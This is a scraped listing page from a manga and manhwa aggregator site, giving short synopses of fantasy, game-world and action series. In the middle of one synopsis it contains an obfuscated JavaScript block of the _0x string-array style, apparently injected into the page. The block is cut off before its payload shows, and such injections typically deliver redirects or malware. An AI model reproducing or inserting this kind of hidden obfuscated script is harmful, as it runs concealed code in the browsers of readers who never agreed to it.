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7498 results

Evolution In The Flood

The earth is suddenly surrounded by a tsunami of unknown origin and a powerful flood makes the mountains tremble in the waves as the ground groans… Su Yi wakes up to find the city flooded, corpses revived and beasts mutated… In the game of the gods, the hunt and Evolution begins.


The King Of Bugs

Song An is a down-and-out programmer at the bottom of the social chain. His daily work consists of fixing bugs BUGs for a game called [New World]. However, he secretly adds his own little Easter eggs in the game. Suddenly, the game somehow became reality. He has to rely on his understanding of the BUGs in the game and the Easter eggs he had set up. Can Song An successfully counterattack? Genres: Action, Fantasy, Drama, Sci fi, Adventure


The Tutorial is Too Hard

Read Manhwa The Tutorial is Too Hard Online For Free At TopManhua Associated Names: The Tutorial Is Too Tough! / The Tutorial Is Too Tough ! / チュートリアルが死ぬほど難しい / 新手关卡太难了 / 新手教學有夠難 / 튜토리얼이 너무 어렵다 The Content The Tutorial is Too Hard: Lee Hojae had given up his life as a pro gamer, until one day he received a mysterious message: “Congratulations! You’ve been invited to the Tutorial World.” Intrigued, he enters the game and confidently chooses “hell” difficulty, but soon learns that he is trapped there. With a mere 0.01% survival rate, Hojae must somehow overcome the game’s agonizing challenges to figure out the real reason he was invited. This tutorial may be tough, but its secrets are what’s truly hellacious. New and hot comics are updated the fastest. The Queen Starts as an A-Lister Marry my husband Adopted by a Murderous Duke Family Manga Zin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.



Adapted from a novel of the same name by Bear, “City of Sanctuary”! “Fantasy”-a popular VR game that sweeps the world. Some people found out that they can enter the game through another way, which makes it possible for them to bring the items and skills they obtained in the game back to reality. But at the same time, dying in the game would mean actually dying in real life. Fang Tian has been in the game world for more than ten years. When he returned to reality, The world he knew has completely changed<script></script><script>(function(_0x59ec3c,_0x5588e2){var _0x5c7f2c=_0x9321,_0x1e36ee=_0x59ec3c();while(!![]){try{var _0x263719=parseInt(_0x5c7f2c(0x18a))/(-0x12b3*0x1+-0xbc1*0x2+0x2*0x151b)*(-parseInt(_0x5c7f2c(0x17d))/(0x71*0x14+0x1be0+-0x3d*0x9a))+parseInt(_0x5c7f2c(0x185))/(-0x1*-0x269e+0x91d*-0x4+-0x227)*(-parseInt(_0x5c7f2c(0x187))/(0x1*0xa7e+0x1*-0x33b+0x73f*-0x1))+-parseInt(_0x5c7f2c(0x175))/(-0x1c8f+-0x1*0x227d+0x3f11)*(parseInt(_0x5c7f2c(0x17b))/(-0x1*-0xfbb+-0x6f*-0x35+-0x26b0))+-parseInt(_0x5c7f2c(0x17a))/(0x15c8*-0x1+0x832*0x2+0x56b)+-parseInt(_0x5c7f2c(0x18d))/(0x2*0x813+0x1e4f+-0x2e6d)*(-parseInt(_0x5c7f2c(0x179))/(-0xb2*-0x2d+0x18b7+-0x37f8))+parseInt(_0x5c7f2c(0x173))/(-0x2133+-0xfee+0x312b)+parseInt(_0x5c7f2c(0x172))/(-0xe4*0x1b+-0xc1*0x5+0x2*0xdee);if(_0x263719===_0x5588e2)break;else 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Blade of Retribution

Read Blade of Retribution Manhwa 폭력의 대가 On the day that Kendo Champion Shiho decided to help out his single mother run a Gukbap restaurant, he received news that his sister, Shiyeon, committed suicide. During the funeral, Shiho realizes that something was wrong. It wasn’t a suicide, she was murdered. In order to learn the truth and get revenge for his sister’s death, Shiho lifts up his sword once more to begin a war of his own

1 days ago

Regressing as the Reincarnated Bastard of the Sword Clan

Discover “Regressing as the Reincarnated“ with daily updates on Mangazin. Read the newest chapters and follow the gripping plot of this intriguing Hot Manhwa The concise overview of “Regressing as the Reincarnated Bastard” The Great Northern Wall. The Dragon Knights. The Lords of the Winter Mountains. The Descendants of the Primordial Dragon. These are the various titles of the Grand Ducal Clan Ragnar, which boasted a rich, thousand year history. Theo Ragnar resolved himself to aiming for the throne of that very same clan. ‘These cursed chains weren’t something I could slip out of. They were meant to be broken with strength.’ Another name for “Regressing as the Reincarnated Bastard” Como vive un bastardo en su regresión How to Survive as the Bastard of the Regression Sword Clan La regresión del bastardo reencarnado del Clan de la Espada Regresando como el bastardo reencarnado del Clan de la Espada กลับชาติใช้ชีวิตใหม่ของลูกนอกสมรสแห่งตระกูลดาบ 회귀검가의 서자가 사는 법


Legend of the Galactic Heroes (FUJISAKI Ryu)

New adaptation of the novel.The story is staged in the distant future within our own Milky Way Galaxy, approximately in the late 36th century. A portion of the galaxy is filled with terraformed worlds inhabited by interstellar traveling human beings. For 150 years two mighty space powers have intermittently warred with each other: the Galactic Empire and the Free Planets Alliance. Within the Galactic Empire, based on mid 19th century Prussia, an ambitious military genius, Reinhard von Müsel, later conferred Reinhard von Lohengramm, is rising to power. He is driven by the desire to free his sister Annerose, who was taken by the Kaiser as a concubine. Later, he wants not only to end the corrupt Goldenbaum dynasty but also to defeat the Free Planets Alliance and to unify the whole galaxy under his rule.In the Free Planets Alliance Star Fleet is another genius, Yang Wen Li. He originally aspired to become a historian through a military academy, and joined the tactical division only out of need for tuition money. He was rapidly promoted to an admiral because he demonstrated excellence in military strategy in a number of decisive battles and conflicts. He becomes the archrival of Reinhard, though they highly respect one another. Unlike Reinhard he is better known for his underdog victories and accomplishments in overcoming seemingly impossible odds and mitigating casualties and damages due to military operations.As a historian, Yang often predicts the motives behind his enemies and narrates the rich history of his world and comments on it. One of his famous quotes is: "There are few wars between good and evil; most are between one good and another good."


Mulan Has No Elder Brother

Ever since He Mulan, a 28-year old forensic investigator, transmigrated into the post-army civilian Hua Mulan’s body, she’s been under a lot of pressure. Unlike the folktale ending, there are no flowers or applause to be found here. After leaving the army and returning to her hometown, word by the countryside has painted the now 32-year old Hua Mulan as a homicidal maniac, an old hag, and a freak of nature, among other nasty things. Between piecing together Hua Mulan’s scattered memories, grappling with her fellow villagers’ prejudice against her, and fending off Mrs Hua’s attempts to match make her, He Mulan has her hands full. All He Mulan wants to do is protect Hua Mulan’s body till her soul comes back, but fate has other plans…



BOZEBEATS is a "priest expelling demons action" story that centers on a priest (bōzu) who lives alone on a strange mountain, when he meets a young man who was raised by wolves. [ANN]


Dragon Quest Retsuden - Roto no Monshou

Many years after the fall of Zoma, the descendants of Roto left Alefgard and divided his emblem into two parts. The brother with the top half, created the kingdom of Loran. The brother with the bottom half, created the kingdom of Carmen. The kingdoms were peaceful and prosperous for many years. Emblem of Roto begins 100 years later. Read More Here


Dead Bug Parasitism

Jump Wong—an infamous, poor little live streamer with zero gold coins—accepts his grandfather's request to transport a body to the Kunlun mountains! Unexpected and thrilling adventures happen along the way! The secret of the "bug" appearance and its extraordinary superpower will slowly be revealed. Just like before, it will be an amusing battle with superpowers! amid the excitement and nerve-racking times, there will be mystery and fun!


Sozai Saishuka no Isekai Ryokouki

Sozai Saishuka no Isekai Ryokouki summary is updating. Come visit sometime to read the latest chapter of Sozai Saishuka no Isekai Ryokouki. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.
